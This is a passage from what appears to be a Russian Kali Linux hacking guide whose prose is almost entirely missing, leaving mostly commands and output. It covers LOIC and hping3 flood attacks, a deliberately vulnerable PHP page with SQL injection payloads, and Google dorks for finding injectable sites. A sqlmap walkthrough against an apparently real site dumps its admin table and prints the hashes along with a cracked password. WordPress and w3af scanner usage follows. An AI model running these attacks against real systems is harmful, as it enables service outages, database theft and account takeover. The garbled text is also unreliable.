1| wget https://raw.github.com/nicolargo/loicinstaller/master/loic.sh

:
1| chmod 777 loic.sh
:
1| ./loic.sh install
- ,
loic. , :
1| ./loic.sh update
, LOIC.
:
1| ./loic.sh run

WebWare.biz 197
Kali Linux 2.0

, , Windows (
)? Linux !

- Low Orbit Ion Cannon (LOIC)


LOIC . IRC .
. URL IP .
. Lock on. : TCP, UDP HTTP.
HTTP. . ,

WebWare.biz 198
Kali Linux 2.0

IMMA CHARGIN MAH LAZER. LOIC .


Stop Flooding :

.. ,
Windows Linux. ,
IRC , .
.

32. - : DoS hping3


IP Kali Linux
-- (DoS)
-- (DDoS)
. , DoS
,
, .
, DoS hping3
IP Kali Linux.
, DDoS , , ,
DoS . 2014 ,
DDoS 28 .
DoS
, ,
. --
-.
,

Minecraft. DoS
. ,
; , CPU.
, .
. - .

WebWare.biz 199
Kali Linux 2.0

DoS, mod_evasive mod-qos.


-
.

,
, .
. , DoS
,
,
,
.
DoS .
. - .
- / ,
.
( , ,
), - (
) . .
- .
, , , -
.
hping3 DoS
GoldenEye ( ,
//, ). ,
, DDoS
DoS :
http://www.digitalattackmap.com/
http://map.norsecorp.com/
http://map.ipviking.com/
-- DoS
hping3
, hping3
IP Kali Linux.
, hping3, .
hping3
hping3 TCP/IP . Hping,
,
,
Idle Scan, Nmap.
hping hping3 Tcl.
TCP/IP ,
, ,
TCP/IP .

WebWare.biz 200
Kali Linux 2.0

, ,
hping3 , ,
.
hping3
Traceroute/ping/probe (//)
, .
( nmap
).
.
IDS ( ).
TCP/IP.

TCP/IP (hping AFAIK).
, TCP/IP
.
.
.
,
TCP/IP .
(IDS)
Tk.
hping3 Kali Linux .
.
DoS hping3 IP
, .
:
1| root@WebWare-Kali:~# hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source
192.168.1.37
2| HPING 192.168.1.37 (eth0 192.168.1.37): S set, 40 headers + 120 data bytes
3| hping in flood mode, no replies will be shown
4| ^C
5| --- 192.168.1.37 hping statistic ---
6| 3258138 packets transmitted, 0 packets received, 100% packet loss
7| round-trip min/avg/max = 0.0/0.0/0.0 ms
8| root@WebWare-Kali:~#
:
hping3 = .
-c 100000 = .

WebWare.biz 201
Kali Linux 2.0

-d 120 = , .
-S = SYN.
-w 64 = TCP.
-p 21 = ( 21 FTP).
.
flood = , ,
. .
rand-source = IP .
-a spoof . man hping3
192.168.1.37 = IP IP .
. ,
, .
, ? hping3
( ,
rand-souce, , IP ).
. top.
:

, .
:

WebWare.biz 202
Kali Linux 2.0

,
.
, si, :
us (User CPU time) ,
sy (System CPU time) ,
ni (Nice CPU time) ,

id
wa (iowait) , -
hi (Hardware IRQ) , hardware-
si (Software Interrupts) , software-
(network)
st (Steal Time) ,
( )
.. si (Software Interrupts) , software-
(network). .

,
Linux SYN .
. , TCP
SYN TCP Connect , IPTables
DoS-, hping3 .
DoS- GoldenEye
- .

5. -
33. WhatWeb:
Kali Linux
WhatWeb
-
. ,
.
.
Powered by. ,
. ,
.
WhatWeb.
, , Powered by ( ,
, -

WebWare.biz 203
Kali Linux 2.0

).
:
1| whatweb http://www1.hut.ru/forum/
whatweb ,
http://www1.hut.ru/forum/ .

, :
1| PoweredBy[phpBB]
2| phpBB[2]
.. phpBB .
, PHP, -, IP ,
- Google AdSense.
, .
:
1| whatweb webware.biz

, .

WebWare.biz 204
Kali Linux 2.0

WhatWeb
WordPress, :
1| whatweb -a 3 webware.biz
:
1| whatweb webware.biz zalinux.ru mi-al.ru

, WhatWeb .
,
( Nmap):
1| whatweb 185.26.122.0/24

WhatWeb
.
input-file=, -i URL, , -i
/dev/stdin
,
WhatWeb :
1| echo 'webware.biz' | whatweb -i /dev/stdin
.
aggression, -a=
1, 3 4.
1 , 3 , 4 ,
.

WebWare.biz 205
Kali Linux 2.0

user-agent, -U= WhatWeb/0.4.8-dev.



header, -H HTTP. "Foo:Bar". ,
. , ,
"User-Agent:", .
follow-redirect= .
`never', `http-only', `meta-only', `same-site', `same-domain' `always'.
: always
max-redirects= . : 10
WhatWeb :
user, -u=<user:password>
header, , header "Cookie: SESSID=1a2b3c;"
WhatWeb:
proxy <hostname[:port]> . : 8080
proxy-user <username:password>
WhatWeb ,
/:
, , . .

, (
) README.TXT, . .
, . ,
, , .

.
,
,
, , .
: "" ,
HTML-, ,
:

, ,

.

WebWare.biz 206
Kali Linux 2.0

,
.
, .
(README.TXT, . .). , WordPress
, , ..

34. SQL-:
( 1)
SQL-
, :
: , .
. .
:

SQL- : , , ( ).
.
. : ,
,
SQL-, , .
, SQL- :
1| <!DOCTYPE html>
2| <html>
3| <head>
4| <meta charset="UTF-8">
5| <title></title>
6| </head>
7| <body>
8| <h2>
:</h2>

WebWare.biz 207
Kali Linux 2.0

9| <form method="get" action="?">


10| <p> </p>
11| <input name="name" type="text">
12| <p> </p>
13| <input name="password" type="text"><br />
14| <input type="submit">
15| </form>
16| <?php
17| $mysqli = new mysqli("localhost", "root", "", "db_library");
18| if (mysqli_connect_errno()) {
19| printf(" : %s\n", mysqli_connect_error());
20| exit();
21| } else {
22| $mysqli->query("SET NAMES UTF8");
23| $mysqli->query("SET CHARACTER SET UTF8");
24| $mysqli->query("SET character_set_client = UTF8");
25| $mysqli->query("SET character_set_connection = UTF8");
26| $mysqli->query("SET character_set_results = UTF8");
27| }
28| $name = filter_input(INPUT_GET, 'name');
29| $password = filter_input(INPUT_GET, 'password');
30| if ($result = $mysqli->query("SELECT * FROM `members` WHERE name = '$name' AND
password = $password")) {
31| while ($obj = $result->fetch_object()) {
32| echo "<p><b> : </b> $obj->name</p>
33| <p><b> :</b> $obj->status</p>
34| <p><b> :</b> $obj->books</p><hr />";
35| }
36| } else {
37| printf(": %s\n", $mysqli->error);
38| }
39| $mysqli->close();
40| ?>
41| </body>
42| </html>
, .
. : index.php db_library.sql. index.php

WebWare.biz 208
Kali Linux 2.0

.
db_library.sql , , phpMyAdmin.
index.php root,
. , :
1| $mysqli = new mysqli("localhost", "root", "", "db_library");
, - .
: Demo, 111.

, ,
. , (
WebWare.biz 209
Kali Linux 2.0

) .
, ,
.
, , :
1| SELECT * FROM `members` WHERE name = '$name' AND password ='$password'
SELECT SQL- , . ,
SELECT name, SELECT name, password.
, .
, . .. SELECT *
.
FROM . FROM , . .
FROM `members` , `members`.
WHERE, - ,
. ,
(1) (0).
(name = '$name') AND (password ='$password')
, , $name
name '$password
password .
( ), ., . .
SELECT * FROM `members` WHERE name = '$name' AND password
='$password' : `members` ,
,
.
. , ,
:

:
http://localhost/test/mysql-inj-lab1/index.php?name=Demo'&password=111

WebWare.biz 210
Kali Linux 2.0

, :
1| : You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '111'' at line 1
, :
1| SELECT * FROM `members` WHERE name = 'Demo' AND password ='111'
, :
1| SELECT * FROM `members` WHERE name = 'Demo' ' AND password ='111'
, . . :
1| SELECT * FROM `members` WHERE name = 'Demo'
, . ,
:
1| ' AND password ='111'
- ,
. , , :
1| SELECT * FROM `members` WHERE name = 'Demo' ' ' AND password ='111'
:
http://localhost/test/mysql-inj-lab1/index.php?name=Demo''&password=111

, .
. ?
.
MySQL :
# ( )
( , )

WebWare.biz 211
Kali Linux 2.0

/* */ ,
, , ,
.
,
, , +, ,
:
1| SELECT * FROM `members` WHERE name = 'Demo' --+ ' AND password ='111'
:
http://localhost/test/mysql-inj-lab1/index.php?name=Demo'+&password=111
, Demo.
:
1| SELECT * FROM `members` WHERE name = 'Demo'
+ ' AND password ='111'
.
:
1| SELECT * FROM `members` WHERE name = 'Demo'
! .. ,
, . ..
SQL-.
, -
.
:
1| WHERE name = 'Demo'
AND, ?
. , (1)
. (1)
. .. :
1| WHERE name = 'Demo' OR 1
, 1.
1.
.. , :
1| SELECT * FROM `members` WHERE name = 'Demo' OR 1

:
http://localhost/test/mysql-inj-lab1/index.php?name=Demo' OR 1 + &password=111

WebWare.biz 212
Kali Linux 2.0

! .
ORDER BY UNION SQL-
, ,
. - ? ,
(, . ,

!
UNION SQL-. ,
UNION .
SQL- .
UNION SQL- SELECT,
. :
SELECT SELECT.
ORDER BY .
, . ,
, :

WebWare.biz 213
Kali Linux 2.0

:
http://localhost/test/mysql-inj-lab1/index.php?name=-1' ORDER BY 1 + &password=111
:
1| SELECT * FROM `members` WHERE name = '-1' ORDER BY 1
-1 .

, :
1| SELECT * FROM `members` WHERE name = '-1' ORDER BY 2
2| SELECT * FROM `members` WHERE name = '-1' ORDER BY 3
3| SELECT * FROM `members` WHERE name = '-1' ORDER BY 4
4| SELECT * FROM `members` WHERE name = '-1' ORDER BY 5
:
1| SELECT * FROM `members` WHERE name = '-1' ORDER BY 6
:
http://localhost/test/mysql-inj-lab1/index.php?name=-1' ORDER BY 6 + &password=111
:
1| : Unknown column '6' in 'order clause'

WebWare.biz 214
Kali Linux 2.0

, .
UNION:
, SELECT ,
. , ,
. NULL
.
1| SELECT * FROM `members` WHERE name = '-1' UNION SELECT 1,2,3,4,5
:
http://localhost/test/mysql-inj-lab1/index.php?name=-1' UNION SELECT 1,2,3,4,5 +
&password=111
:

WebWare.biz 215
Kali Linux 2.0

UNION.
:
1| SELECT * FROM `members` WHERE name = '-1' UNION SELECT 1
2| SELECT * FROM `members` WHERE name = '-1' UNION SELECT 1,2
3| SELECT * FROM `members` WHERE name = '-1' UNION SELECT 1,2,3
4| SELECT * FROM `members` WHERE name = '-1' UNION SELECT 1,2,3,4
:
1| : The used SELECT statements have a different number of columns

.
, UNION SELECT 1,2,3,4,5
. .
SELECT
, UNION:
DATABASE()
CURRENT_USER()
@@datadir
USER()
VERSION()
2, 4 5. ..
.
DATABASE() UNION SELECT
:
http://localhost/test/mysql-inj-lab1/index.php?name=-1' UNION SELECT 1,2,3,4,DATABASE()
+ &password=111
WebWare.biz 216
Kali Linux 2.0

CURRENT_USER() UNION SELECT


:
http://localhost/test/mysql-inj-lab1/index.php?name=-1' UNION SELECT
1,2,3,4,CURRENT_USER() + &password=111
:

WebWare.biz 217
Kali Linux 2.0

@@datadir UNION SELECT


:
http://localhost/test/mysql-inj-lab1/index.php?name=-1' UNION SELECT 1,2,3,4,@@datadir
+ &password=111
:

,
information_schema , tables.
,
. , table_schema
'db_library' ( DATABASE()).
UNION. .
MySQL UNION .
:
1| : Illegal mix of collations for operation 'UNION'
- , sqlmap
:
1| something went wrong with full UNION technique (could be because of limitation on
retrieved number of entries). Falling back to partial UNION technique
, MySQL 5.6. ..
,
,
UNION. ,
.
UNION,
: ,

WebWare.biz 218
Kali Linux 2.0

, .
, SQL- UNION,
:
SQLMAP Kali Linux: - SQL-

: SQL-
sqlmap Windows

.. , LIMIT. LIMIT SQL-


.

35. SQLMAP Kali Linux: -


SQL-
Windows, "
sqlmap Windows". ,
" : SQL-".
, , Kali Linux,
, ? ,
- . , ,
,
. ()
, -
. , PHP,
, !
-
.

WebWare.biz 219
Kali Linux 2.0

SQLMAP,
SQL-.
, , , ,
.
SQL- , ,
, ( ) SQL
(,
). SQL-
, ,
, SQL ,
.
SQL- -,
SQL .
SQLMAP SQL- Kali
Linux , , - ( , )
Kali Linux.
: Kali Linux,
Kali Linux:
.
, WebWare.biz
Kali Linux.
SQLMAP
sqlmap ,
SQL-
.
,

,

.

MySQL, Oracle,
PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,
Sybase SAP MaxDB.
SQL-: ,
, , UNION ,
.
SQL-
, IP ,
.
, , , ,
, .

.

WebWare.biz 220
Kali Linux 2.0

, , ,
.

.
,
.
, , ,
, name
pass ( ).
()
, MySQL,
PostgreSQL Microsoft SQL Server.

, ,
MySQL, PostgreSQL
Microsoft SQL Server.
(out-of-band) TCP

. ,
Meterpreter (VNC)
.
Metasploit
Meterpreter.
, ,
- , , .
- , .
, .
, :

1: -
, , ,
. , Google Dorks , .
, , ,
. - ,
, .

1.: Google Dorks SQLMAP SQL -

. .
, .
, .

WebWare.biz 221
Kali Linux 2.0

Google Dork string Column


Google Dork string Column 1 Google Dork string Column 3
2

inurl:item_id= inurl:review.php?id= inurl:hosting_info.php?id=

inurl:newsid= inurl:iniziativa.php?in= inurl:gallery.php?id=

inurl:trainers.php?id= inurl:curriculum.php?id= inurl:rub.php?idr=

inurl:news-full.php?id= inurl:labels.php?id= inurl:view_faq.php?id=

inurl:news_display.php?getid= inurl:story.php?id= inurl:artikelinfo.php?id=

inurl:index2.php?option= inurl:look.php?ID= inurl:detail.php?ID=

inurl:readnews.php?id= inurl:newsone.php?id= inurl:index.php?=

inurl:top10.php?cat= inurl:aboutbook.php?id= inurl:profile_view.php?id=

inurl:newsone.php?id= inurl:material.php?id= inurl:category.php?id=

inurl:event.php?id= inurl:opinions.php?id= inurl:publications.php?id=

inurl:product-item.php?id= inurl:announce.php?id= inurl:fellows.php?id=

inurl:sql.php?id= inurl:rub.php?idr= inurl:downloads_info.php?id=

inurl:index.php?catid= inurl:galeri_info.php?l= inurl:prod_info.php?id=

inurl:news.php?catid= inurl:tekst.php?idt= inurl:shop.php?do=part&id=

inurl:index.php?id= inurl:newscat.php?id= inurl:productinfo.php?id=

inurl:newsticker_info.php?id
inurl:news.php?id= inurl:collectionitem.php?id=
n=

inurl:index.php?id= inurl:rubrika.php?idr= inurl:band_info.php?id=

inurl:trainers.php?id= inurl:rubp.php?idr= inurl:product.php?id=

inurl:buy.php?category= inurl:offer.php?idf= inurl:releases.php?id=

inurl:article.php?ID= inurl:art.php?idm= inurl:ray.php?id=

inurl:play_old.php?id= inurl:title.php?id= inurl:produit.php?id=

inurl:declaration_more.php?de
inurl:news_view.php?id= inurl:pop.php?id=
cl_id=

inurl:pageid= inurl:select_biblio.php?id= inurl:shopping.php?id=

inurl:games.php?id= inurl:humor.php?id= inurl:productdetail.php?id=

inurl:page.php?file= inurl:aboutbook.php?id= inurl:post.php?id=

inurl:newsDetail.php?id= inurl:ogl_inet.php?ogl_id= inurl:viewshowdetail.php?id=

WebWare.biz 222
Kali Linux 2.0

inurl:fiche_spectacle.php?id
inurl:gallery.php?id= inurl:clubpage.php?id=
=

inurl:communique_detail.ph
inurl:article.php?id= inurl:memberInfo.php?id=
p?id=

inurl:show.php?id= inurl:sem.php3?id= inurl:section.php?id=

inurl:staff_id= inurl:kategorie.php4?id= inurl:theme.php?id=

inurl:newsitem.php?num= inurl:news.php?id= inurl:page.php?id=

inurl:shredder-
inurl:readnews.php?id= inurl:index.php?id=
categories.php?id=

inurl:top10.php?cat= inurl:faq2.php?id= inurl:tradeCategory.php?id=

inurl:product_ranges_view.ph
inurl:historialeer.php?num= inurl:show_an.php?id=
p?ID=

inurl:reagir.php?num= inurl:preview.php?id= inurl:shop_category.php?id=

inurl:Stray-Questions-
inurl:loadpsb.php?id= inurl:transcript.php?id=
View.php?num=

inurl:forum_bds.php?num= inurl:opinions.php?id= inurl:channel_id=

inurl:game.php?id= inurl:spr.php?id= inurl:aboutbook.php?id=

inurl:view_product.php?id= inurl:pages.php?id= inurl:preview.php?id=

inurl:newsone.php?id= inurl:announce.php?id= inurl:loadpsb.php?id=

inurl:sw_comment.php?id= inurl:clanek.php4?id= inurl:pages.php?id=

inurl:news.php?id= inurl:participant.php?id=

inurl:avd_start.php?avd= inurl:download.php?id=

inurl:event.php?id= inurl:main.php?id=

inurl:product-item.php?id= inurl:review.php?id=

inurl:sql.php?id= inurl:chappies.php?id=

inurl:material.php?id= inurl:read.php?id=

inurl:clanek.php4?id= inurl:prod_detail.php?id=

inurl:announce.php?id= inurl:viewphoto.php?id=

inurl:chappies.php?id= inurl:article.php?id=

inurl:read.php?id= inurl:person.php?id=

WebWare.biz 223
Kali Linux 2.0

inurl:viewapp.php?id= inurl:productinfo.php?id=

inurl:viewphoto.php?id= inurl:showimg.php?id=

inurl:rub.php?idr= inurl:view.php?id=

inurl:galeri_info.php?l= inurl:website.php?id=

1.: , -
SQLMAP SQL-
, ,
. , SQLMAP SQL-
. , ,
, .
, inurl:rubrika.php?idr=, -
:
1| http://www.sqldummywebsite.name/rubrika.php?id=28

' URL. ( "


, ' ).
:
1| http://www.sqldummywebsite.name/rubrika.php?id=28'

SQL , SQLMAP SQL-.


,
.
.

WebWare.biz 224
Kali Linux 2.0

SQLi
Microsoft SQL Server
1| Server Error in / Application. Unclosed quotation mark before the character string
attack;
2| Description: An unhanded exception occurred during the execution of the current web
request. Please review the stack trace for more information about the error where it
originated in the code.
3| Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before
the character string attack;.

MySQL
1| Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
/var/www/myawesomestore.com/buystuff.php on line 12
2| Error: You have an error in your SQL syntax: check the manual that corresponds to your
MySQL server version for the right syntax to use near at line 12

Oracle
1| java.sql.SQLException: ORA-00933: SQL command not properly ended at
oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at
oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
2| Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly
terminated

PostgreSQL Errors
1| Query failed: ERROR: unterminated quoted string at or near

2: SQLMAP SQL-
, -
SQLMAP SQL-.
( ).
SQLMAP, , .
-:
1| sqlmap -u http://www.sqldummywebsite.name/rubrika.php?id=31 --dbs

:
sqlmap = sqlmap
-u = (. http://www.sqldummywebsite.name/rubrika.php?id=31)
dbs =

WebWare.biz 225
Kali Linux 2.0

:
1| web server operating system: Linux Gentoo
2| web application technology: Nginx, PHP 5.3.29
3| back-end DBMS: MySQL 5.0.11
4| [18:47:01] [INFO] resumed: information_schema
5| [18:47:01] [INFO] resumed: laminat
, , ,
information_schema MYSQL.
, laminat.

3. ,
SQLMAP SQL-
-
. :
1| sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat --tables

WebWare.biz 226
Kali Linux 2.0

, 18 :
1| [18:52:25] [INFO] fetching tables for database: 'laminat'
2| [18:52:25] [INFO] fetching number of tables for database 'laminat'
3| [18:52:25] [INFO] resumed: 18
4| [18:52:25] [INFO] resumed: admin
5| [18:52:25] [INFO] resumed: browser
6| [18:52:25] [INFO] resumed: diskuse
7| [18:52:25] [INFO] resumed: diskuse_obor
8| [18:52:25] [INFO] resumed: diskuse_tema
9| [18:52:25] [INFO] resumed: historie
10| [18:52:25] [INFO] resumed: mag_admvolby
11| [18:52:25] [INFO] resumed: mag_anketa
12| [18:52:25] [INFO] resumed: mag_autori
13| [18:52:25] [INFO] resuming partial value: mag_cla
14| [18:52:25] [WARNING] running in a single-thread mode. Please consider 15| usage of
option '--threads' for faster data retrieval
15| [18:52:25] [INFO] retrieved: ori
16| [18:54:23] [INFO] retrieved: mag_claori...

, admin, SQLMAP SQL-


, , , .

WebWare.biz 227
Kali Linux 2.0

4:
SQLMAP SQL-
admin
-, SQLMAP SQL-. SQLMAP SQL-
, :
1| sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin --columns

1| [19:57:42] [INFO] fetching columns for table 'admin' in database 'laminat'


2| [19:57:42] [INFO] resumed: 5
3| [19:57:42] [INFO] resumed: id
4| [19:57:42] [INFO] resumed: int(2)
5| [19:57:42] [INFO] resumed: login
6| [19:57:42] [INFO] resumed: v
7| [19:57:42] [INFO] resumed: heslo
8| [19:57:42] [INFO] resumed: varchar(32)
9| [19:57:42] [INFO] resumed: jmeno
10| [19:57:42] [INFO] resumed: varchar(20)
11| [19:57:42] [INFO] resumed: stupen
12| [19:57:42] [INFO] resumed: int(1)
13| Database: laminat
14| Table: admin
15| [5 columns]
16| +--------+--------------------+
17| | Column | Type |
18| +--------+--------------------+
19| | heslo | varchar(32) |
20| | id | int(2) |
21| | jmeno | varchar(20) |
22| | login | v |
23| | stupen | int(1) |
24| +--------+--------------------+

WebWare.biz 228
Kali Linux 2.0

! , . ,
:
heslo
stupen
login .
.. .

5: SQLMAP SQL-

SQLMAP SQL- ! :
1| sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin --dump

WebWare.biz 229
Kali Linux 2.0

. , ,
, , ,
:
1| sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin -C login --
dump
.
, .
.

6: SQLMAP SQL-

, . , :
1| sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin -C heslo --
dump
!! .
, . - . -
, -
.
. . ,
.

WebWare.biz 230
Kali Linux 2.0

, - , sqlmap .
, , do you want to store hashes to a temporary file for eventual
further processing with other tools, . . ,
. .
do you want to crack them via a dictionary-based attack?,
, , .
, , , .
:
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter) (
Enter)
[2] custom dictionary file ( )
[3] file with list of dictionary files ( )
Enter.
, , do you want to use common password suffixes?
(slow!). , . ,
.
. .
:
1| do you want to store hashes to a temporary file for eventual further processing with other
tools [y/N] n
2| do you want to crack them via a dictionary-based attack? [Y/n/q] y
3| [20:00:41] [INFO] using hash method 'md5_generic_passwd'
4| [20:00:41] [INFO] resuming password 'nuvolari' for hash
'493ccdcab464cff215467d4c62a7f142'
5| what dictionary do you want to use?
6| [1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
7| [2] custom dictionary file
8| [3] file with list of dictionary files
9| >1
10| [20:00:45] [INFO] using default dictionary
11| do you want to use common password suffixes? (slow!) [y/N] n
12| [20:00:49] [INFO] starting dictionary-based cracking (md5_generic_passwd)
13| [20:01:05] [INFO] postprocessing table dump
14| Database: laminat
15| Table: admin
16| [2 entries]
17| +----+---------------+-----------------------------------------------------+-------+--------+
18| | id | jmeno | heslo | login | stupen |
19| +----+---------------+-----------------------------------------------------+-------+--------+

WebWare.biz 231
Kali Linux 2.0

20| | 1 | M?la | 493ccdcab464cff215467d4c62a7f142 (nuvolari) | fucek | 1 |


21| | 4 | Administr?tor | d41d8cd98f00b204e9800998ecf8427e | admin | 1 |
22| +----+---------------+-----------------------------------------------------+-------+--------+
, !
.
. .
.
,
, .
, ,

( https://ru.wikipedia.org/wiki/_ ) ,
, . .
,
.
, ,
MD5, phpBB, MySQL SHA1 Hashcat Kali.
.


. -,
.
, - ,
. , , , , ,
, , ,
, ,
!

36. Firefox
Google Chrome " Chrome".
Dojo.
.
,
. .
, ,
, .
, -,
, ,
-.
( ).
: 2 (
- Firefox),

WebWare.biz 232
Kali Linux 2.0

Firefox , .
.
, .
0. Firefox
, , ,
, ,
/ ( Chrome , -
).
.
Firefox, .
.
1. Cookies Manager+
Cookies Manager , ,
/.
(, , )
Add N Edit Cookies v0.2.1.3 goodwill.
Add N Edit Cookies:
()
,


,



,
, /


/ .
"expire",
"new date"
"Add cookie" ,
( )

2. Firebug
:
Firebug Firefox ,
, .

WebWare.biz 233
Kali Linux 2.0

, CSS, HTML JavaScript



3. MM3-ProxySwitch

.
Proxy Switch
.

,
MM3 .
4. Selenium IDE
Selenium IDE Selenium.
Firefox ,
. Selenium IDE Selenium Core,
,
.
Selenium IDE , IDE.
,
.
, Selenium IDE Selenium,
.
http://docs.seleniumhq.org/download/,
Selenium IDE ( !), Firefox
.
:
Selenium IDE Button
Selenium IDE SelBlocks
Selenium IDE: PHP Formatters
5. SQL Inject Me
, .
: https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/.
.
SQL-.
,
SQL-.
( ) ,
,
HTML .
6. Tamper Data
HTTP/HTTPS. Tamper Data
HTTP/HTTPS post.
WebWare.biz 234
Kali Linux 2.0

7. User Agent Switcher



. ,
.
8. Web Developer
-.
9. XSS Me
. :
https://addons.mozilla.org/en-us/firefox/addon/xss-me
(XSS) -
. XSS -
. XSS
- .
XSS-Me XSS .
: HTML ,
XSS . HTML
JavaScript ( document.vulnerable=true),
XSS.
10. HackBar
, Dojo, - .
SQL-.
SQL-, XSS .
:
(url)
, url
(Ctrl+Enter) / .
url .

uu/url .
.
MD5/SHA1/SHA256
MySQL/MS SQL Server/Oracle
XSS
.
:
url ( Alt + A )
url ( Alt + S )
( Alt + X, Ctrl + Enter )

WebWare.biz 235
Kali Linux 2.0

INT -1 ( Alt )
INT +1 ( Alt + )
HEX -1 ( Ctrl Alt )
HEX +1 ( Ctrl + Alt + )
MD5 Hash ( Alt + M )
MySQL CHAR() ( Alt + Y )
MS SQL Server CHAR() ( Alt + Q )

37. WordPress: WPScanner


Plecost
, . WebWare.biz
, ,
. . , WebWare.biz, ,
: ,
. ,
:
, -.
(
, ). ,
.
Kali Linux, , ,
Kali Linux ( , ).
WordPress .
. WordPress
, ,
(!).
WordPress .
WordPress Security Scanner
WordPress. :
;
;
;
robots.txt;
WordPress, ,
.
, . ( ):
1| wpscan --update

( ), .
WebWare.biz 236
Kali Linux 2.0

WordPress Security Scanner


update : .
url -u < url> : URL / WordPress .
force -f : WPScan ,
WordPress ( , WordPress,
).
enumerate -e [()] : (
).
:
u : id 1 10
u[10-20] : id 10 20 ( []
)
p :
vp : , ,
ap : ( )
tt : timthumbs
t :
vt : , ,
at : ( ).
, -e p,vt
. ,
"vt,tt,u,vp".
, ,
. :
1| wpscan -h

:
1| wpscan -u webware.biz -e p,vt

.. wpscan, -u
-. -e (
).
,
( ).
, WordPress,
, :

WebWare.biz 237
Kali Linux 2.0

WebWare.biz 238
Kali Linux 2.0

WordPress .
:
/proxy/admin.php, Glype;
, . .
, wp-content/plugins/wordpress-backup-to-dropbox/. ,
,
,
. ,
VPS ( ,
).
Plecost
WordPress .
, ( ,
).
, , .
, . .
, .
: , Plecost 1.0.1
WordPress.

-i, .
, .
Kali Linux //usr/share/plecost/wp_plugin_list.txt (
).
plecost -i //usr/share/plecost/wp_plugin_list.txt,
. :
1| plecost -i //usr/share/plecost/wp_plugin_list.txt webware.biz
( ):

WebWare.biz 239
Kali Linux 2.0

, , Metasploit Framework
searchsploit, The Exploit Database .
: WPScan Vulnerability Database (
WordPress) Packet Storm ( ).
( WordPress)
1. WordPress (
-).
2. , ,
WordPress, (
-) , ,
. .. - ,
, .
3. WordPress:
,
. .

WordPress. , , , "" .
: ) , ; )
.
4.
( 30 , ).
-
( ). ,
.
5. ! Kali Linux ! ,
. , Kali Linux,
Linux. ,
.
, ,
, . ..

, - , , , .
, ( )
,
. , ,
,
. .., ,
(
), "" ,
, .

38. Plecost 1.0.1


WordPress
Kali.Tools

WebWare.biz 240
Kali Linux 2.0

Plecost ( WordPress: WPScanner


Plecost). , , WordPress,

,
.
Plecost ,
1.0.1.
Plecost 1.0.1:
.
: .
CVE : Plecost
NIST SQLite
WordPress .
WordPress: Plecost WordPress
( ).
.
wordpress .
CHANGELOG.
Plecost 1.0.1
Kali Linux Plecost . : Kali
, .
LMDE 2 ( Debian, Mint, Ubuntu).
1| sudo apt-get install python3-pip python3-dev python3-wheel
2| sudo python3 -m pip install plecost

Plecost 1.0.1

WebWare.biz 241
Kali Linux 2.0

:
1| plecost http://SITE.com
:
JSON XML:
JSON
1| plecost -v http://SITE.com -o results.json
XML
1| plecost -v http://SITE.com -o results.xml

Plecost 1.0.1
WordPress, :
1| plecost -nc http://SITE.com
, WordPress:
1| plecost -f http://SITE.com
:
1| plecost -nb http://SITE.com
wordlists:
1| mial@mint ~ $ plecost -nb -l
2| // Plecost - WordPress finger printer Tool - v1.0.0
3| Available word lists:
4| 1 - plugin_list_50.txt
5| 2 - plugin_list_1000.txt
6| 3 - plugin_list_100.txt
7| 4 - plugin_list_250.txt
8| 6 - plugin_list_huge.txt
9| 7 - plugin_list_10.txt
10| mial@mint ~ $
wordlist :
1| plecost -nb -w plugin_list_10.txt http://SITE.com
( ,
-!)
1| plecost --concurrency 10 http://SITE.com
:
1| plecost -c 10 http://SITE.com
help:
1| plecost -h

WebWare.biz 242
Kali Linux 2.0

Plecost
,
:
:
1| sudo plecost --update-cve
:
1| sudo plecost --update-plugins


:
1| mial@mint ~ $ plecost -nb --show-plugins
2| // Plecost - WordPress finger printer Tool - v1.0.0
3| [*] Plugins with vulnerabilities known:
4| { 0 } - ab_google_map_travel
5| { 1 } - acobot_live_chat_%26_contact_form
6| { 2 } - activehelper_livehelp_live_chat
7| { 3 } - ad-manager
8| { 4 } - alipay
9| { 5 } - all-video-gallery
10| { 6 } - all_in_one_seo_pack
11| { 7 } - all_in_one_wordpress_security_and_firewall
12| { 8 } - another_wordpress_classifieds_plugin
13| { 9 } - anyfont
14| { 10 } - april%27s_super_functions_pack
15| { 11 } - audio_player
16| { 12 } - banner_effect_header
17| { 13 } - bannerman
18| { 14 } - bib2html
19| { 15 } - bic_media_widget
20| { 16 } - bird_feeder
21| { 17 } - blogstand-smart-banner
22| { 18 } - blue_wrench_video_widget
23| { 19 } - bookx
24| { 20 } - bradesco_gateway
25| { 21 } - bsk_pdf_manager
26| { 22 } - bulletproof-security

WebWare.biz 243
Kali Linux 2.0

27| { 23 } - bulletproof_security
28| { 24 } - cakifo
:
1| plecost -nb -vp google_analytics
CVE:
1| plecost -nb --cve CVE-2014-9174
? - WordPress.

39. W3af Kali Linux


http://pentesterconfessions.blogspot.ru/2007/10/how-to-
use-w3af-to-audit-web.html w3af.
Entest, , !

W3af (Web Application Attack and Audit Framework) open-source -


.
, -
. , .
-
XSS, CSRF Sqli w3af .
W3af
W3af :
1| w3af_console
:
1| w3af>>> help
:
1| start .
2| plugins .
3| exploit .
4| profiles .
5| cleanup .
6|
7| help . : help [] ,
""
8| version w3af.
9| keys .
10|

WebWare.biz 244
Kali Linux 2.0

11| http-settings HTTP


12| misc-settings w3af.
13| target URL.
14|
15| back
16| exit w3af.
17|
18| kb , .

w3af .
,
"back".
"view"
.
"target". URL .
:
1| w3af>>> target
2| w3af/config:target>>> help

:
1| view
2| set
3| save
4|
5| back
6| exit w3af

URL :
1| w3af/config:target>>> set target http://localhost
2| w3af/config:target>>> view

:
1| w3af/config:target>>> back
